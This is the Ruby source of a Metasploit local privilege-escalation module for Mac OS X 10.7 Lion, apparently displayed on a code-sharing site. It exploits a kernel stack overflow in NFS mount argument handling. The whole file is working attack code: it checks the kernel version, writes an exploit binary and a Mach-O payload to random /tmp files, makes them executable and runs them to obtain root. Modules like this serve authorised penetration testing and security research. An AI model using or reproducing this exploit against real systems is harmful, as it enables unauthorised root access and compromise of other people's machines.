Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = NormalRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::OSX::Priv
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(update_info(info,
16
      'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
17
      'Description'   => %q{
18
        This exploit leverages a stack buffer overflow vulnerability to escalate privileges.
19
        The vulnerable function nfs_convert_old_nfs_args does not verify the size
20
        of a user-provided argument before copying it to the stack. As a result, by
21
        passing a large size as an argument, a local user can overwrite the stack with arbitrary
22
        content.
23

24
        Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
25
      },
26
      'License'       => MSF_LICENSE,
27
      'Author'        =>
28
        [
29
          'Kenzley Alphonse', # discovery and a very well-written exploit
30
          'joev' # msf module
31
        ],
32
      'References'    =>
33
        [
34
          [ 'EDB', '32813' ]
35
        ],
36
      'Platform'      => 'osx',
37
      'Arch'          => [ ARCH_X64 ],
38
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
39
      'Targets'       => [
40
        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
41
          {
42
            'Platform' => 'osx',
43
            'Arch' => ARCH_X64
44
          }
45
        ]
46
      ],
47
      'DefaultTarget' => 0,
48
      'DisclosureDate' => '2014-04-11'
49
    ))
50
  end
51

52
  def check
53
    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
54
      CheckCode::Appears
55
    else
56
      CheckCode::Safe
57
    end
58
  end
59

60
  def exploit
61
    if is_root?
62
      fail_with Failure::BadConfig, 'Session already has root privileges'
63
    end
64

65
    if check != CheckCode::Appears
66
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
67
    end
68

69
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
70
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
71
    exploit = File.read(file)
72
    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
73
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
74
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
75

76
    print_status "Writing temp file as '#{tmpfile}'"
77
    write_file(tmpfile, exploit)
78
    register_file_for_cleanup(tmpfile)
79

80
    print_status "Writing payload file as '#{payloadfile}'"
81
    write_file(payloadfile, pload)
82
    register_file_for_cleanup(payloadfile)
83

84
    print_status "Executing payload..."
85
    cmd_exec("chmod +x #{tmpfile}")
86
    cmd_exec("chmod +x #{payloadfile}")
87
    cmd_exec("#{tmpfile} #{payloadfile}")
88
  end
89

90
  def xnu_ver
91
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
92
    m && m[1]
93
  end
94

95
  def ver_lt(a, b)
96
    Rex::Version.new(a.gsub(/~.*?$/,'')) < Rex::Version.new(b.gsub(/~.*?$/,''))
97
  end
98
end
99

100